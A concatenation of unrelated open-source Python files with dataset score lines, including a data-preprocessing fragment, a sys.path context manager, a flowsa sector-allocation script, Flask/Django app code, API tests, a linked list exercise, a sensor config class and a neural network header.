        tmp_data_dir = os.path.join(self.cfg.paths.preprocess.tmp_dir, self.tmp_output.folder_name)
        io.ensure_dir_exists(tmp_data_dir)
        object_infos_path = os.path.join(tmp_data_dir, self.tmp_output.object_info)
        io.write_json(object_infos, object_infos_path)

        num_processes = min(cpu_count(), self.cfg.num_workers)
        # calculate the chunk size
        chunk_size = max(1, int(input_data.shape[0] / num_processes))
        chunks = [input_data.iloc[input_data.index[i:i + chunk_size]] for i in
                  range(0, input_data.shape[0], chunk_size)]
        log.info(f'Stage2 Processing Start with {num_processes} workers and {len(chunks)} chunks')

        # Plain-value config so ProcStage2Impl stays picklable for the pool.
        config = OmegaConf.create()
        config.input_h5_path = self.input_h5_path
        config.stage1_tmp_dir = os.path.join(self.cfg.paths.preprocess.tmp_dir, self.stag1_tmp_output.folder_name)
        config.tmp_output_dir = os.path.join(self.cfg.paths.preprocess.tmp_dir, self.tmp_output.folder_name)
        config.output_path = os.path.join(config.tmp_output_dir, output_filename)
        config.rest_state_data_filename = self.stag1_tmp_output.rest_state_data
        config.object_infos_path = object_infos_path
        config.heatmap_threshold = self.heatmap_threshold
        config.export = self.cfg.export
        with Pool(processes=num_processes) as pool:
            proc_impl = ProcStage2Impl(config)
            output_filepath_list = pool.starmap(proc_impl, enumerate(chunks))

        # Merge the per-chunk h5 files into one file for this split.
        h5_output_path = os.path.join(output_dir, output_filename)
        h5file = h5py.File(h5_output_path, 'w')
        for filepath in output_filepath_list:
            with h5py.File(filepath, 'r') as h5f:
                for key in h5f.keys():
                    h5f.copy(key, h5file)
        h5file.close()

        # if self.debug:
        #     tmp_data_dir = os.path.join(self.cfg.paths.preprocess.tmp_dir, self.tmp_output.folder_name)
        #     io.ensure_dir_exists(tmp_data_dir)
        #     with h5py.File(h5_output_path, 'r') as h5file:
        #         visualizer = ANCSHVisualizer(h5file, NetworkType.ANCSH, gt=True, sampling=20)
        #         visualizer.point_size = 5
        #         visualizer.arrow_sampling = 10
        #         visualizer.prefix = ''
        #         visualizer.render(show=self.show, export=tmp_data_dir, export_mesh=self.export)
| 1.976563 | 2 |
cli/skyline/user_code_utils.py | danielsnider/ecosystem-project-website-template | 23 | 12765038 | <filename>cli/skyline/user_code_utils.py
import contextlib
import os
import sys
from skyline.exceptions import exceptions_as_analysis_errors
@contextlib.contextmanager
def user_code_environment(script_root_path, project_root):
    """Run user code under every context manager it needs.

    Bundles sys.path patching, module-cache isolation, and exception
    translation into one reusable context manager.
    """
    with sys_path_root(script_root_path), \
            prevent_module_caching(), \
            exceptions_as_analysis_errors(project_root):
        yield
@contextlib.contextmanager
def sys_path_root(script_root_path):
    """Temporarily point ``sys.path[0]`` at *script_root_path*.

    Python sets ``sys.path[0]`` to the directory of the script that
    launched the interpreter, and module resolution consults it first.
    When we exec() user code, ``sys.path[0]`` points at Skyline's own
    executable, so imports inside the user's project would not resolve
    the way they do when the user runs ``python3 entry_point.py``
    themselves.

    This context manager swaps ``sys.path[0]`` to the user's script root
    for the duration of the block and restores Skyline's path afterwards.
    Swapping (rather than appending the user's path) avoids accidentally
    importing anything from the user's codebase into Skyline itself. Use
    it around every execution of user code, since imports may also happen
    inside user-defined functions.
    """
    saved_root = sys.path[0]
    try:
        sys.path[0] = script_root_path
        yield
    finally:
        sys.path[0] = saved_root
@contextlib.contextmanager
def prevent_module_caching():
    """Discard any modules imported while the context is active.

    Everything present in ``sys.modules`` on entry survives; any entry
    added during the block is removed again on exit, so user imports are
    neither cached for later runs nor leaked into Skyline's interpreter.
    """
    try:
        baseline = set(sys.modules)
        yield
    finally:
        for added_name in set(sys.modules) - baseline:
            del sys.modules[added_name]
| 2.609375 | 3 |
flowsa/flowbysector.py | modelearth/flowsa | 13 | 12765039 | # flowbysector.py (flowsa)
# !/usr/bin/env python3
# coding=utf-8
"""
Produces a FlowBySector data frame based on a method file for the given class
To run code, specify the "Run/Debug Configurations" Parameters to the
"flowsa/data/flowbysectormethods" yaml file name
you want to use.
Example: "Parameters: --m Water_national_2015_m1"
Files necessary to run FBS:
a. a method yaml in "flowsa/data/flowbysectormethods"
b. crosswalk(s) for the main dataset you are allocating and any datasets
used to allocate to sectors
c. a .py file in "flowsa/" for the main dataset you are allocating if
you need functions to clean up the FBA
before allocating to FBS
"""
import argparse
import yaml
import pandas as pd
from esupy.processed_data_mgmt import write_df_to_file
import flowsa
from flowsa.common import log, vLog, flowbysectormethodpath, flow_by_sector_fields, \
fips_number_key, flow_by_activity_fields, load_source_catalog, \
flowbysectoractivitysetspath, flow_by_sector_fields_w_activity, \
paths, fba_activity_fields, rename_log_file, \
fbs_activity_fields, fba_fill_na_dict, fbs_fill_na_dict, fbs_default_grouping_fields, \
fbs_grouping_fields_w_activities, logoutputpath
from flowsa.metadata import set_fb_meta, write_metadata
from flowsa.fbs_allocation import direct_allocation_method, function_allocation_method, \
dataset_allocation_method
from flowsa.sectormapping import add_sectors_to_flowbyactivity, map_fbs_flows, \
get_sector_list
from flowsa.flowbyfunctions import agg_by_geoscale, sector_aggregation, \
aggregator, subset_df_by_geoscale, sector_disaggregation, dynamically_import_fxn
from flowsa.dataclean import clean_df, harmonize_FBS_columns, reset_fbs_dq_scores
from flowsa.validation import allocate_dropped_sector_data,\
compare_activity_to_sector_flowamounts, \
compare_fba_geo_subset_and_fbs_output_totals, compare_geographic_totals,\
replace_naics_w_naics_from_another_year, calculate_flowamount_diff_between_dfs
def parse_args():
    """Parse the command-line arguments.

    :return: dict with the single key 'method', the FBS method yaml name
    """
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "-m", "--method", required=True,
        help="Method for flow by sector file. "
             "A valid method config file must exist with this name.")
    return vars(parser.parse_args())
def load_method(method_name):
    """
    Loads a flowbysector method from a YAML
    :param method_name: str, FBS method name (ex. 'Water_national_m1_2015')
    :return: dictionary, items in the FBS method yaml, or None if the
        method file could not be found
    """
    sfile = flowbysectormethodpath + method_name + '.yaml'
    # fix: initialize before the try block so a missing file no longer
    # raises UnboundLocalError at the return statement after logging
    method = None
    try:
        with open(sfile, 'r') as f:
            method = yaml.safe_load(f)
    except IOError:
        log.error("FlowBySector method file not found.")
    return method
def load_source_dataframe(k, v):
    """
    Load the source dataframe. Data can be a FlowbyActivity or
    FlowBySector parquet stored in flowsa, or a FlowBySector
    formatted dataframe from another package.
    :param k: str, The datasource name
    :param v: dictionary, The datasource parameters
    :return: df of identified parquet, or None if the data_format in the
        method yaml is not recognized
    """
    # fix: initialize before branching so an unrecognized data_format no
    # longer raises UnboundLocalError right after the error is logged
    flows_df = None
    if v['data_format'] == 'FBA':
        # if yaml specifies a geoscale to load, use parameter to filter dataframe
        geo_level = v.get('source_fba_load_scale')
        vLog.info("Retrieving flowbyactivity for datasource %s in year %s", k, str(v['year']))
        flows_df = flowsa.getFlowByActivity(datasource=k, year=v['year'], flowclass=v['class'],
                                            geographic_level=geo_level)
    elif v['data_format'] == 'FBS':
        vLog.info("Retrieving flowbysector for datasource %s", k)
        flows_df = flowsa.getFlowBySector(k)
    elif v['data_format'] == 'FBS_outside_flowsa':
        vLog.info("Retrieving flowbysector for datasource %s", k)
        flows_df = dynamically_import_fxn(k, v["FBS_datapull_fxn"])(v)
    else:
        vLog.error("Data format not specified in method file for datasource %s", k)
    return flows_df
def main(**kwargs):
    """
    Creates a flowbysector dataset.

    For each source named in the method yaml: loads the source data, maps
    it to the flow list, subsets it by activity set, attributes flows to
    sectors via the configured allocation method, aggregates geographically
    and across sector levels, validates totals, then concatenates all
    activity sets into one FBS parquet written to the local folder.

    :param kwargs: dictionary of arguments, only argument is "method", the name of method
        corresponding to flowbysector method yaml name (parsed from the
        command line when called with no kwargs)
    :return: parquet, FBS save to local folder
    """
    if len(kwargs) == 0:
        kwargs = parse_args()

    method_name = kwargs['method']
    # assign arguments
    vLog.info("Initiating flowbysector creation for %s", method_name)
    # call on method
    method = load_method(method_name)
    # create dictionary of data and allocation datasets
    fb = method['source_names']
    # Create empty list for storing fbs files
    fbs_list = []
    for k, v in fb.items():
        # pull fba data for allocation
        flows = load_source_dataframe(k, v)

        if v['data_format'] == 'FBA':
            # ensure correct datatypes and that all fields exist
            flows = clean_df(flows, flow_by_activity_fields,
                             fba_fill_na_dict, drop_description=False)

            # map flows to federal flow list or material flow list
            flows_mapped, mapping_files = map_fbs_flows(flows, k, v, keep_fba_columns=True)

            # clean up fba, if specified in yaml
            if "clean_fba_df_fxn" in v:
                vLog.info("Cleaning up %s FlowByActivity", k)
                flows_mapped = dynamically_import_fxn(k, v["clean_fba_df_fxn"])(flows_mapped)

            # if activity_sets are specified in a file, call them here
            if 'activity_set_file' in v:
                aset_names = pd.read_csv(flowbysectoractivitysetspath +
                                         v['activity_set_file'], dtype=str)
            else:
                aset_names = None

            # create dictionary of allocation datasets for different activities
            activities = v['activity_sets']
            # subset activity data and allocate to sector
            for aset, attr in activities.items():
                # subset by named activities
                if 'activity_set_file' in v:
                    names = aset_names[aset_names['activity_set'] == aset]['name']
                else:
                    names = attr['names']

                vLog.info("Preparing to handle %s in %s", aset, k)
                # subset fba data by activity
                # (match on either the produced-by or consumed-by activity)
                flows_subset =\
                    flows_mapped[(flows_mapped[fba_activity_fields[0]].isin(names)) |
                                 (flows_mapped[fba_activity_fields[1]].isin(names)
                                  )].reset_index(drop=True)

                # if activities are sector-like, check sectors are valid
                if load_source_catalog()[k]['sector-like_activities']:
                    flows_subset2 =\
                        replace_naics_w_naics_from_another_year(flows_subset,
                                                                method['target_sector_source'])
                    # check impact on df FlowAmounts
                    vLog.info('Calculate FlowAmount difference caused by '
                              'replacing NAICS Codes with %s, saving difference in Validation log',
                              method['target_sector_source'],)
                    calculate_flowamount_diff_between_dfs(flows_subset, flows_subset2)
                else:
                    flows_subset2 = flows_subset.copy()

                # extract relevant geoscale data or aggregate existing data
                flows_subset_geo = subset_df_by_geoscale(flows_subset2, v['geoscale_to_use'],
                                                         attr['allocation_from_scale'])
                # if loading data subnational geoscale, check for data loss
                if attr['allocation_from_scale'] != 'national':
                    compare_geographic_totals(flows_subset_geo, flows_mapped, k,
                                              attr, aset, names)

                # Add sectors to df activity, depending on level of specified sector aggregation
                log.info("Adding sectors to %s", k)
                flows_subset_wsec =\
                    add_sectors_to_flowbyactivity(flows_subset_geo,
                                                  sectorsourcename=method['target_sector_source'],
                                                  allocationmethod=attr['allocation_method'])
                # clean up fba with sectors, if specified in yaml
                if "clean_fba_w_sec_df_fxn" in v:
                    vLog.info("Cleaning up %s FlowByActivity with sectors", k)
                    flows_subset_wsec = \
                        dynamically_import_fxn(k, v["clean_fba_w_sec_df_fxn"])(flows_subset_wsec,
                                                                               attr=attr,
                                                                               method=method)

                # rename SourceName to MetaSources and drop columns
                flows_mapped_wsec = flows_subset_wsec.\
                    rename(columns={'SourceName': 'MetaSources'}).\
                    drop(columns=['FlowName', 'Compartment'])

                # if allocation method is "direct", then no need to create alloc ratios,
                # else need to use allocation
                # dataframe to create sector allocation ratios
                if attr['allocation_method'] == 'direct':
                    fbs = direct_allocation_method(flows_mapped_wsec, k, names, method)
                # if allocation method for an activity set requires a specific
                # function due to the complicated nature
                # of the allocation, call on function here
                elif attr['allocation_method'] == 'allocation_function':
                    fbs = function_allocation_method(flows_mapped_wsec, k, names, attr, fbs_list)
                else:
                    fbs =\
                        dataset_allocation_method(flows_mapped_wsec, attr,
                                                  names, method, k, v, aset,
                                                  method_name, aset_names)

                # drop rows where flowamount = 0 (although this includes dropping suppressed data)
                fbs = fbs[fbs['FlowAmount'] != 0].reset_index(drop=True)

                # define grouping columns dependent on sectors being activity-like or not
                if load_source_catalog()[k]['sector-like_activities'] is False:
                    groupingcols = fbs_grouping_fields_w_activities
                    groupingdict = flow_by_sector_fields_w_activity
                else:
                    groupingcols = fbs_default_grouping_fields
                    groupingdict = flow_by_sector_fields

                # clean df
                fbs = clean_df(fbs, groupingdict, fbs_fill_na_dict)

                # aggregate df geographically, if necessary
                log.info("Aggregating flowbysector to %s level", method['target_geoscale'])
                # determine from scale (the smaller of the loaded geoscale
                # and the allocation geoscale, per fips_number_key ordering)
                if fips_number_key[v['geoscale_to_use']] <\
                        fips_number_key[attr['allocation_from_scale']]:
                    from_scale = v['geoscale_to_use']
                else:
                    from_scale = attr['allocation_from_scale']

                fbs_geo_agg = agg_by_geoscale(fbs, from_scale,
                                              method['target_geoscale'], groupingcols)

                # aggregate data to every sector level
                log.info("Aggregating flowbysector to all sector levels")
                fbs_sec_agg = sector_aggregation(fbs_geo_agg, groupingcols)
                # add missing naics5/6 when only one naics5/6 associated with a naics4
                fbs_agg = sector_disaggregation(fbs_sec_agg)

                # check if any sector information is lost before reaching
                # the target sector length, if so,
                # allocate values equally to disaggregated sectors
                vLog.info('Searching for and allocating FlowAmounts for any parent '
                          'NAICS that were dropped in the subset to '
                          '%s child NAICS', method['target_sector_level'])
                fbs_agg_2 = allocate_dropped_sector_data(fbs_agg, method['target_sector_level'])

                # compare flowbysector with flowbyactivity
                compare_activity_to_sector_flowamounts(
                    flows_mapped_wsec, fbs_agg_2, aset, k, method)

                # return sector level specified in method yaml
                # load the crosswalk linking sector lengths
                sector_list = get_sector_list(method['target_sector_level'])

                # subset df, necessary because not all of the sectors are
                # NAICS and can get duplicate rows
                # three mutually exclusive cases: both sector columns in
                # the list, only produced-by, only consumed-by
                fbs_1 = fbs_agg_2.loc[(fbs_agg_2[fbs_activity_fields[0]].isin(sector_list)) &
                                      (fbs_agg_2[fbs_activity_fields[1]].isin(sector_list))].\
                    reset_index(drop=True)
                fbs_2 = fbs_agg_2.loc[(fbs_agg_2[fbs_activity_fields[0]].isin(sector_list)) &
                                      (fbs_agg_2[fbs_activity_fields[1]].isnull())].\
                    reset_index(drop=True)
                fbs_3 = fbs_agg_2.loc[(fbs_agg_2[fbs_activity_fields[0]].isnull()) &
                                      (fbs_agg_2[fbs_activity_fields[1]].isin(sector_list))].\
                    reset_index(drop=True)
                fbs_sector_subset = pd.concat([fbs_1, fbs_2, fbs_3])

                # drop activity columns
                fbs_sector_subset = fbs_sector_subset.drop(['ActivityProducedBy',
                                                            'ActivityConsumedBy'],
                                                           axis=1, errors='ignore')

                # save comparison of FBA total to FBS total for an activity set
                compare_fba_geo_subset_and_fbs_output_totals(flows_subset_geo, fbs_sector_subset,
                                                             aset, k, v, attr, method)
                log.info("Completed flowbysector for %s", aset)
                fbs_list.append(fbs_sector_subset)
        else:
            # if the loaded flow dt is already in FBS format, append directly to list of FBS
            log.info("Append %s to FBS list", k)
            # ensure correct field datatypes and add any missing fields
            flows = clean_df(flows, flow_by_sector_fields, fbs_fill_na_dict)
            fbs_list.append(flows)
    # create single df of all activities
    log.info("Concat data for all activities")
    fbss = pd.concat(fbs_list, ignore_index=True, sort=False)
    log.info("Clean final dataframe")
    # add missing fields, ensure correct data type, add missing columns, reorder columns
    fbss = clean_df(fbss, flow_by_sector_fields, fbs_fill_na_dict)
    # prior to aggregating, replace MetaSources string with all sources
    # that share context/flowable/sector values
    fbss = harmonize_FBS_columns(fbss)
    # aggregate df as activities might have data for the same specified sector length
    fbss = aggregator(fbss, fbs_default_grouping_fields)
    # sort df
    log.info("Sort and store dataframe")
    # ensure correct data types/order of columns
    fbss = clean_df(fbss, flow_by_sector_fields, fbs_fill_na_dict)
    fbss = fbss.sort_values(
        ['SectorProducedBy', 'SectorConsumedBy', 'Flowable', 'Context']).reset_index(drop=True)
    # tmp reset data quality scores
    fbss = reset_fbs_dq_scores(fbss)
    # save parquet file
    meta = set_fb_meta(method_name, "FlowBySector")
    write_df_to_file(fbss, paths, meta)
    write_metadata(method_name, method, meta, "FlowBySector")
    # rename the log file saved to local directory
    rename_log_file(method_name, meta)
    log.info('See the Validation log for detailed assessment of model results in %s', logoutputpath)
# Allow running this module directly from the command line, e.g.
# ``python flowbysector.py -m Water_national_2015_m1``.
if __name__ == '__main__':
    main()
| 2.21875 | 2 |
tests/api/test_api_create_pseudorandom_ids.py | LCBRU/identity | 0 | 12765040 | <gh_stars>0
import pytest
from identity.printing.discordance import ID_TYPE_PARTICIPANT
from identity.model.id import PseudoRandomId
from tests.api import add_api_key_to_url
path = '/api/create_pseudorandom_ids'
@pytest.mark.parametrize(
    "id_count",
    [
        (1),
        (10),
    ],
)
def test__create_pseudorandom_ids__valid_json(client, faker, id_count):
    # Happy path: a valid prefix and count returns 201 with exactly
    # id_count freshly-persisted pseudo-random IDs.
    resp = client.post(add_api_key_to_url(faker.get_api_key(), path), json=dict(
        prefix=ID_TYPE_PARTICIPANT,
        id_count=id_count,
    ))
    assert resp.status_code == 201
    assert resp.json is not None
    assert resp.json['ids'] is not None
    assert len(resp.json['ids']) == id_count
    assert PseudoRandomId.query.filter(PseudoRandomId.full_code.in_(resp.json['ids'])).count() == id_count
def test__create_pseudorandom_ids__no_prefix(client, faker):
    # Missing 'prefix' field -> 400 Bad Request.
    resp = client.post(add_api_key_to_url(faker.get_api_key(), path), json=dict(
        id_count=1,
    ))
    assert resp.status_code == 400
def test__create_pseudorandom_ids__no_id_count(client, faker):
    # Missing 'id_count' field -> 400 Bad Request.
    resp = client.post(add_api_key_to_url(faker.get_api_key(), path), json=dict(
        prefix=ID_TYPE_PARTICIPANT,
    ))
    assert resp.status_code == 400
def test__create_pseudorandom_ids__prefix_invalid(client, faker):
    # Unknown prefix -> 400 Bad Request.
    resp = client.post(add_api_key_to_url(faker.get_api_key(), path), json=dict(
        prefix='NONENEHIUEIUEIUG',
        id_count=1,
    ))
    assert resp.status_code == 400
@pytest.mark.parametrize(
    "id_count",
    [
        (0),
        (-1),
    ],
)
def test__create_pseudorandom_ids__invalid_id_count(client, faker, id_count):
    # Non-positive id_count -> 400 Bad Request.
    resp = client.post(add_api_key_to_url(faker.get_api_key(), path), json=dict(
        prefix=ID_TYPE_PARTICIPANT,
        id_count=id_count,
    ))
    assert resp.status_code == 400
app.py | cynepton/fyyur | 0 | 12765041 | #----------------------------------------------------------------------------#
# Imports
#----------------------------------------------------------------------------#
import json
import dateutil.parser
import babel
from flask import Flask, render_template, request, Response, flash, redirect, url_for
from flask_moment import Moment
from flask_sqlalchemy import SQLAlchemy
import logging
from logging import Formatter, FileHandler
from flask_wtf import Form, FlaskForm
from forms import *
from flask_migrate import Migrate
import psycopg2
#----------------------------------------------------------------------------#
# App Config.
#----------------------------------------------------------------------------#
db = SQLAlchemy()
def create_app():
    """Application factory: build the Flask app, load config, bind SQLAlchemy."""
    app = Flask(__name__)
    # TODO: connect to a local postgresql database
    app.config.from_object('config')
    db.init_app(app)
    return app
app = create_app()
moment = Moment(app)
migrate = Migrate(app, db)
#----------------------------------------------------------------------------#
# Models.
#----------------------------------------------------------------------------#
# Seperated into models.py
from models import Venue, Artist, Shows
#----------------------------------------------------------------------------#
# Filters.
#----------------------------------------------------------------------------#
def format_datetime(value, format='medium'):
    """Jinja filter: parse a date string and render it via Babel.

    ``format`` is either 'full' or 'medium'; the name is reused to hold the
    corresponding Babel pattern before formatting.
    """
    date = dateutil.parser.parse(value)
    if format == 'full':
        format="EEEE MMMM, d, y 'at' h:mma"
    elif format == 'medium':
        format="EE MM, dd, y h:mma"
    return babel.dates.format_datetime(date, format)
app.jinja_env.filters['datetime'] = format_datetime
#----------------------------------------------------------------------------#
# Controllers.
#----------------------------------------------------------------------------#
@app.route('/')
def index():
    # Landing page.
    return render_template('pages/home.html')
# ----------------------------------------------------------------
# Routes
# ----------------------------------------------------------------
from routes import *
@app.errorhandler(404)
def not_found_error(error):
    # Custom 404 page.
    return render_template('errors/404.html'), 404
@app.errorhandler(500)
def server_error(error):
    # Custom 500 page.
    return render_template('errors/500.html'), 500
if not app.debug:
file_handler = FileHandler('error.log')
file_handler.setFormatter(
Formatter('%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]')
)
app.logger.setLevel(logging.INFO)
file_handler.setLevel(logging.INFO)
app.logger.addHandler(file_handler)
app.logger.info('errors')
#----------------------------------------------------------------------------#
# Launch.
#----------------------------------------------------------------------------#
# Default port:
# if __name__ == '__main__':
# app.run()
# Or specify port manually:
if __name__ == '__main__':
port = int(os.environ.get('PORT', 5000))
app.run(host='0.0.0.0', port=port)
| 2.296875 | 2 |
colab/apps/issues/urls.py | caseywstark/colab | 1 | 12765042 | from django.conf.urls.defaults import *
from issues.models import Issue
from voting.views import vote_on_object
# URL routes for the issues app; view names resolve against "issues.views".
urlpatterns = patterns("issues.views",
    # Listing and creation.
    url(r"^$", "issues", name="issue_list"),
    url(r"^create/$", "create", name="issue_create"),
    url(r"^my_issues/$", "issues", kwargs={'mine': True}, name="my_issues"),
    # issue-specific
    url(r"^issue/(?P<slug>[-\w]+)/$", "issue", name="issue_detail"),
    url(r"^issue/(?P<slug>[-\w]+)/delete/$", "delete", name="issue_delete"),
    url(r'^issue/(?P<slug>[-\w]+)/edit/$', "edit", name="issue_edit"),
    url(r'^issue/(?P<slug>[-\w]+)/resolve/$', "resolve", name="issue_resolve"),
    url(r'^issue/(?P<slug>[-\w]+)/invite/$', "invite", name="issue_invite"),
    # issue voting (handled by the generic django-voting view)
    url(r'^issue/(?P<object_id>\d+)/(?P<direction>up|down|clear)vote/$',
        vote_on_object, dict(model=Issue, template_object_name='issue',
        allow_xmlhttprequest=True, confirm_vote=False), name="issue_vote"),
)
| 2.046875 | 2 |
data_structures_two/2_linked_list.py | amanalok/python-dsa | 0 | 12765043 | <filename>data_structures_two/2_linked_list.py
class Node:
    """A single element of a singly linked list."""

    def __init__(self, data):
        self.data = data  # payload stored in this node
        self.next = None  # reference to the following node (None = end of list)

    def __repr__(self):
        # str() rather than returning ``data`` directly: __repr__ must return
        # a string, so the original raised TypeError for non-string payloads.
        return str(self.data)
class LinkedList:
    """Singly linked list tracking both ends.

    ``front`` is the first node and ``rear`` the last; both are None when the
    list is empty.  Payloads are compared with ``==`` and are expected to be
    strings (``__repr__`` joins them with '->').
    """

    def __init__(self):
        self.front = None
        self.rear = None

    def __repr__(self):
        current = self.front
        nodes = []
        while current is not None:
            nodes.append(current.data)
            current = current.next
        nodes.append('None')
        return '->'.join(nodes)

    def __iter__(self):
        """Yield each node from front to rear."""
        current = self.front
        while current is not None:
            yield current
            current = current.next

    def add_front(self, data):
        """Insert ``data`` at the head of the list."""
        node = Node(data)
        node.next = self.front
        self.front = node
        if self.rear is None:  # list was empty: the new node is also the rear
            self.rear = node

    def add_rear(self, data):
        """Append ``data`` at the tail of the list."""
        node = Node(data)
        if self.front is None:  # empty list: node is both front and rear
            self.front = node
            self.rear = node
        else:
            self.rear.next = node
            self.rear = node

    def add_after(self, target_node_data, new_node_data):
        """Insert ``new_node_data`` right after the first node whose data
        equals ``target_node_data``.  Raises if the list is empty or no
        matching node exists."""
        if self.front is None:
            # Bug fix: was ``raise('...')``, which itself raises TypeError
            # because exceptions must derive from BaseException.
            raise Exception('Linked List is empty !!!')
        for node in self:
            if node.data == target_node_data:
                if node.next is None:
                    return self.add_rear(new_node_data)
                new_node = Node(new_node_data)
                new_node.next = node.next
                node.next = new_node
                return
        raise Exception('Node with data {} not found in linked list'
                        .format(target_node_data))

    def add_before(self, target_node_data, new_node_data):
        """Insert ``new_node_data`` right before the first node whose data
        equals ``target_node_data``."""
        if self.front is None:
            raise Exception('Linked List is empty')
        if self.front.data == target_node_data:
            return self.add_front(new_node_data)
        previous_node = self.front
        for node in self:
            if node.data == target_node_data:
                new_node = Node(new_node_data)
                new_node.next = node
                previous_node.next = new_node
                return
            previous_node = node
        raise Exception('Node with data {} not found in linked list'
                        .format(target_node_data))

    def remove_node(self, target_node_data):
        """Remove the first node whose data equals ``target_node_data``."""
        if self.front is None:
            raise Exception('Linked List is empty')
        if self.front.data == target_node_data:
            self.front = self.front.next
            if self.front is None:  # bug fix: list emptied, clear stale rear
                self.rear = None
            return
        previous_node = self.front
        for node in self:
            if node.data == target_node_data:
                previous_node.next = node.next
                if node is self.rear:  # bug fix: keep rear at the last node
                    self.rear = previous_node
                return
            previous_node = node
        raise Exception('Node with data {} not found in linked list'
                        .format(target_node_data))

    def reverse(self):
        """Reverse the list in place (front and rear swap roles)."""
        if self.front is None:
            raise Exception('Linked list is empty')
        self.rear = self.front  # bug fix: the old front becomes the new rear
        prev_node = None
        current_node = self.front
        while current_node is not None:
            next_node = current_node.next
            current_node.next = prev_node
            prev_node = current_node
            current_node = next_node
        self.front = prev_node

    def sort(self):
        """Sort payloads in ascending order in place by swapping data values
        (selection/bubble hybrid; node links are untouched)."""
        if self.front is None:
            raise Exception('Linked list is empty')
        for node in self:
            next_node = node.next
            while next_node is not None:
                if node.data > next_node.data:
                    node.data, next_node.data = next_node.data, node.data
                next_node = next_node.next
def singly_single_list():
    """Demo driver: exercise LinkedList insert/remove/reverse/sort, printing each stage."""
    llist = LinkedList()
    foo = 0
    # Alternate front/rear insertion of the first ten letters.
    for item in ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j']:
        if foo % 2 == 0:
            llist.add_front(item)
        else:
            llist.add_rear(item)
        foo += 1
    print(llist)
    # Insertions relative to existing values.
    llist.add_after('j', 'o')
    llist.add_after('a', 'k')
    llist.add_after('f', 'f')
    llist.add_after('i', 'n')
    llist.add_rear('m')
    print(llist)
    llist.add_before('i', 'z')
    llist.add_before('z', 'y')
    llist.add_before('n', 'p')
    llist.add_before('m', 'q')
    # llist.add_before('x', 'u')
    print(llist)
    llist.remove_node('y')
    llist.remove_node('m')
    llist.remove_node('a')
    print(llist)
    print('*** Reversing linked list ***')
    llist.reverse()
    print(llist)
    llist.sort()
    print('*** Sorted linked list ***')
    print(llist)
if __name__ == '__main__':
    singly_single_list()
| 3.953125 | 4 |
src/scs_dfe/climate/sht_conf.py | open-seneca/alphasense_aq_sensor | 1 | 12765044 | """
Created on 13 Dec 2016
@author: <NAME> (<EMAIL>)
the I2C addresses of the internal (in A4 pot) and external (exposed to air) SHTs
example JSON:
{"int": "0x44", "ext": "0x45"}
"""
from collections import OrderedDict
from scs_core.data.json import PersistentJSONable
from scs_dfe.climate.sht31 import SHT31
# --------------------------------------------------------------------------------------------------------------------
class SHTConf(PersistentJSONable):
    """
    I2C configuration for a pair of SHT31 temperature/humidity sensors:
    the internal one (inside the A4 package) and the external one
    (exposed to air).  Either address may be None if that sensor is absent.
    Persisted as JSON, e.g. {"int": "0x44", "ext": "0x45"}.
    """
    __FILENAME = "sht_conf.json"
    @classmethod
    def persistence_location(cls, host):
        # Directory + filename where this configuration is persisted.
        return host.conf_dir(), cls.__FILENAME
    # ----------------------------------------------------------------------------------------------------------------
    @classmethod
    def __addr_str(cls, addr):
        # Render an I2C address as "0xNN"; None passes through.
        if addr is None:
            return None
        return "0x%02x" % addr
    # ----------------------------------------------------------------------------------------------------------------
    @classmethod
    def construct_from_jdict(cls, jdict):
        # Build from the persisted JSON dict; None for an empty/missing dict.
        if not jdict:
            return None
        int_str = jdict.get('int')
        ext_str = jdict.get('ext')
        # base-0 int() accepts "0x.." hex strings as well as plain decimals
        int_addr = None if int_str is None else int(int_str, 0)
        ext_addr = None if ext_str is None else int(ext_str, 0)
        return SHTConf(int_addr, ext_addr)
    # ----------------------------------------------------------------------------------------------------------------
    def __init__(self, int_addr, ext_addr):
        """
        Constructor
        """
        super().__init__()
        self.__int_addr = int_addr          # int I2C address of SHT in A4 package
        self.__ext_addr = ext_addr          # int I2C address of SHT exposed to air
    # ----------------------------------------------------------------------------------------------------------------
    def int_sht(self):
        # Instantiate the internal SHT31 driver, or None if not configured.
        if self.__int_addr is None:
            return None
        return SHT31(self.__int_addr)
    def ext_sht(self):
        # Instantiate the external SHT31 driver, or None if not configured.
        if self.__ext_addr is None:
            return None
        return SHT31(self.__ext_addr)
    # ----------------------------------------------------------------------------------------------------------------
    @property
    def int_addr(self):
        return self.__int_addr
    @property
    def ext_addr(self):
        return self.__ext_addr
    # ----------------------------------------------------------------------------------------------------------------
    def as_json(self):
        # Serialise to the persisted JSON shape: {"int": "0x44", "ext": "0x45"}.
        jdict = OrderedDict()
        jdict['int'] = SHTConf.__addr_str(self.__int_addr)
        jdict['ext'] = SHTConf.__addr_str(self.__ext_addr)
        return jdict
    # ----------------------------------------------------------------------------------------------------------------
    def __str__(self, *args, **kwargs):
        return "SHTConf:{int_addr:%s, ext_addr:%s}" % \
               (SHTConf.__addr_str(self.int_addr), SHTConf.__addr_str(self.ext_addr))
| 2.15625 | 2 |
src/NN_4_layer.py | FrankZhang427/ModifiedMNIST | 0 | 12765045 | <gh_stars>0
# This file implements the 4-layer fully-connected feedforward neuron network. The activation function is tanh and softmax is implemented at the output layer. A weighting function is incorporated in the gradient descent process to deal with imbalanced training classes. Different hyper-parameters can be specified at the beginning of the two files, and accuracies and unweighted losses will be output during training.
# NOTE: You may need to delete the comment on the forth line to execute the file.
# The struction of the network is essentially the same as that given in [1] and the code for the self-defined functions is based on that in [1].
# Reference: [1]. <NAME>, Implementing a Neural Network from Scratch in Python – An Introduction, 2015. [Online]. Available: http://www.wildml.com/2015/09/implementing-a-neural-network-from-scratch/. [Accessed: 12-Nov.-17].
#
# Author: <NAME>. Last modified 12 Nov, 2017.
# Parameters
# Input and output training file names
filename_y="train_y.csv"
filename_x="train_x.csv"
test_size=0.2 # The proportion of the test set to be used in validation
# Network and gradient descent parameters
input_dim = 4096 # input layer dimensionality
output_dim = 40 # output layer dimensionality
hdim1=128 # The number of nodes in hidden layer 1 (the second hidden layer)
hdim0_range=[256,512,1024] # The number of nodes in the first hidden layer
epsilon_range = [0.01,0.008,0.012] # Learning rate for gradient descent
num_passes_current=1000 # Number of updates to be performed
print_interval_current=50 # Interval for performance metrics' output
import numpy as np
# The three functions has been taken from [1] and modified to suit the 4-layer network. Besides, the third one has been modified to incorporate weighting of classes, to display different information, and to enable specification of more parameters when calling the function.
